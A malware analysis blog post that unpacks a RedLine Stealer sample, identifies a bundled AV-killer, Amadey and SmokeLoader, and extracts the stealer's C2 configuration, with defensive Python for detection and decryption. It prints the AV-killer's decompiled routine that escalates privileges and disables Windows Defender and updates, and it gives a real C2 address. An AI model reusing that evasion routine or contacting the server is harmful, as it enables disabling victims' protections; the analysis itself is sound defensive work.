RedlineStealer is the top malware family on Malware Bazaar, and I’ve been curious about it for a while. So here is a quick first look with some unpacking, config extraction and identifying a locale check.
The sample was chosen in a very simple way: picking the newest sample on Malware Bazaar which was tagged as Redline. Analysis will show that the sample does not just include Redline, but also an AV-Killer, and probably also Amadey and SmokeLoader.
The Splunk Threat Research Team looked at a similar sample in June already and has prettier graphics and deobfuscation, as well as some more details. But I’ll include some things here they didn’t write about: Countries being excluded from being targeted (spoiler: CIS) and how to extract the C2 server IP config!
Sample: d38ebded167e18fcca38e50d9161e679046b51be9c9b80eeb51250571f9d2f86
One of the first things one can notice when looking at the sample in PeStudio, or even in the file properties, is the description “Win32 Cabinet Self-Extractor”.
Looking at the entropy one can clearly see that there is compressed or encrypted content packed in the file. This Self-Extractor is a Microsoft product for self-decompressing executables intended for software installation and updates. The compressed content can be found in a CABINET resource in the file.
This also makes unpacking very easy - by using the appropriate commandline switches.
Using the /? parameter helps to see the commandline options for unpacking:
Using this, the initial file can be unpacked easily:
redline.exe /C /T:C:\Users\_USER_\Desktop\unpack
This provides two new files:
v4165882.exe is another Win32 Cabinet Self-Extractor, which can be unpacked in the same way:
v4165882.exe /C /T:C:\Users\_USER_\Desktop\unpack
And yet again, v2231630.exe is another file that needs to be unpacked:
v2231630.exe /C /T:C:\Users\_USER_\Desktop\unpack
This provides us with two more files:
In total this initial file extracted four interesting executables (ignoring the self-extractors):
A quick first look at the hashes on VirusTotal shows all of them as malicious: AVKiller, Redline Stealer, SmokeLoader and Amadey
A small visualisation of the unpacking process:
SHA256: 7fb74cdd97c37be1a1aa474755b1ef7026b6da7d54d5010a31f87610a137355b
This is a .NET executable for defense evasion. Looking at the file in dnSpy shows a completely unobfuscated file telling us a story in the main function alone: Privilege escalation, disabling services, and changing registry keys (focusing on Windows defender and updates):
// Healer.Program
// Token: 0x06000010 RID: 16 RVA: 0x0000228C File Offset: 0x0000048C
private static void Main()
{
    try
    {
        Program.GetUsername();
        Program.StartTrustedinstallerService();
        Program.EscalateToSystem();
        Program.EscalateToTrustedinstaller();
        Program.DisableService("WinDefend");
        Program.RegistryEdit("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableIOAVProtection", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableRealtimeMonitoring", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\Notifications", "DisableNotifications", "1");
        Program.DisableService("wuauserv");
        Program.DisableService("WaaSMedicSvc");
        Program.DisableService("UsoSvc");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AUOptions", "2");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "AutoInstallMinorUpdates", "0");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoUpdate", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "NoAutoRebootWithLoggedOnUsers", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", "UseWUServer", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "DoNotConnectToWindowsUpdateInternetLocations", "1");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUStatusServer", "server.wsus");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUServer", "server.wsus");
        Program.RegistryEdit("SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "UpdateServiceUrlAlternate", "server.wsus");
    }
    catch
    {
    }
}
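A defender-side check for the registry changes listed above, written as an added example for this post (it is not code from the sample or from any referenced tool). It parses a registry export in .reg syntax and reports which of the Healer settings are present with the malware's values; the sample export is constructed, only a subset of the keys is listed, and HKEY_LOCAL_MACHINE as the hive is an assumption, since the decompiled RegistryEdit calls do not show it.

```python
# Subset of the values the Healer sample writes (from the decompiled Main above).
# Hive is assumed to be HKLM; the decompiled code does not show it.
HEALER_SETTINGS = {
    (r"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection"): "0",
    (r"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware"): "1",
    (r"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection",
     "DisableRealtimeMonitoring"): "1",
    (r"SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU", "NoAutoUpdate"): "1",
    (r"SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate", "WUServer"): "server.wsus",
    (r"SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate", "WUStatusServer"): "server.wsus",
}

# Constructed .reg-style export used as sample input (not taken from a real host).
SAMPLE_EXPORT = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"WUServer"="server.wsus"
"WUStatusServer"="server.wsus"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features]
"TamperProtection"=dword:00000005
"""


def parse_reg_export(text):
    """Parse a minimal subset of .reg syntax into {(subkey, name): value}.
    dword values are normalised to decimal strings so they compare
    directly with the string arguments seen in the decompiled code."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].split("\\", 1)[1]  # drop the hive name
        elif key and line.startswith('"') and "=" in line:
            name, raw = line.split("=", 1)
            name = name.strip('"')
            if raw.startswith("dword:"):
                values[(key, name)] = str(int(raw[len("dword:"):], 16))
            else:
                values[(key, name)] = raw.strip('"')
    return values


def find_healer_settings(text):
    """Return the (subkey, name) pairs whose value matches what Healer sets."""
    present = parse_reg_export(text)
    return sorted(k for k, v in HEALER_SETTINGS.items() if present.get(k) == v)


if __name__ == "__main__":
    for subkey, name in find_healer_settings(SAMPLE_EXPORT):
        print(f"matches Healer value: {subkey}\\{name}")
```

On a real host the input would come from `reg export` of the two policy trees; a TamperProtection value other than 0 (as in the constructed input) is correctly not reported.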
SHA256: 4de7dcea514e6b52a1f43e89e462fea2488eb448ed143f084b5711eef0d3ac28
Based on some quick research this file seems to be Amadey bot and was not further analysed here.
SHA256: 7ec02c57f746e6abb650023709b7758e48dcf9ebbfb0a20d987fbb4b5f1f47ee
Based on some quick research this file seems to be SmokeLoader and was not further analysed here.
SHA256: cfda7cc0495842dd8a5fc56c68de17888e38551436196f1cbc4586cfc5dcefd0
Based on some quick research this file seems to be Redline Stealer and will be analyzed in more detail in the following section.
First, it can be noted that this is a .NET executable with probably at least one layer of obfuscation applied:
Using de4dot and forcing the Confuser deobfuscation allows for some deobfuscation (but definitely not completely):
de4dot.exe d4937146.exe -p cr
de4dot v3.1.41592.3405 Copyright (C) 2011-2015 de4dot@gmail.com
Latest version and source code: https://github.com/0xd4d/de4dot
Detected Confuser (C:\Users\_USER_\Desktop\unpack\d4937146.exe)
Cleaning C:\Users\_USER_\Desktop\unpack\d4937146.exe
Renaming all obfuscated symbols
Saving C:\Users\_USER_\Desktop\unpack\d4937146-cleaned.exe
When running the binary one of the initial steps - before decrypting the C2 server config - appears to be a region check.
Deobfuscated strings show the countries belonging to (or formerly associated with) the Commonwealth of Independent States (CIS) where the malware is not being executed:
Shortly after that the malware decrypts the included configuration for the C2 server using XOR decryption. In this case the password for decryption is “Formative”:
Config:
The field “IP”, containing the C2 IP and port, is xored using this password and the result gets base64 decoded:
The whole process can be repeated and verified in Cyberchef:
These strings are contained in the #US stream and can be read from there using the Unit42 dotnetfile parser. With this we can build a simple config extractor (Github):
> python3 ./config_extractor.py -f d4937146.exe
{
    "key": "Formative",
    "id": "J1w4BQJHOEs=",
    "ip": "CBURGC4gLAMrLAgHIwsTXzsxLRg8FyRJ",
    "decrypted_ip": "77.91.68.68:19071"
}
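The decryption step the extractor performs, as an added example written for this post (it is not the extractor from the linked repository and does not read the #US stream; the encrypted "ip" value and the key are the ones from the output above). The stored value is itself base64, so the order is base64 decode, XOR with the repeating key, base64 decode again:

```python
import base64
from itertools import cycle

# Values from the extractor output above (sample d4937146.exe).
KEY = "Formative"
ENC_IP = "CBURGC4gLAMrLAgHIwsTXzsxLRg8FyRJ"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decrypt_redline_field(enc: str, key: str) -> str:
    """Decrypt one config string as stored in the #US stream.

    base64(enc) -> XOR-encrypted bytes; XOR with key -> a second base64
    string; decoding that -> plaintext.
    """
    layer1 = base64.b64decode(enc)
    layer2 = xor_bytes(layer1, key.encode())
    return base64.b64decode(layer2).decode()


def extract_c2(enc_ip: str, key: str) -> tuple:
    """Split the decrypted 'ip' field into (host, port)."""
    host, port = decrypt_redline_field(enc_ip, key).rsplit(":", 1)
    return host, int(port)


if __name__ == "__main__":
    print(extract_c2(ENC_IP, KEY))  # ('77.91.68.68', 19071)
```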
A next step for this analysis would be checking and building Yara rules for detection and analysing the stealer functionality (what and how).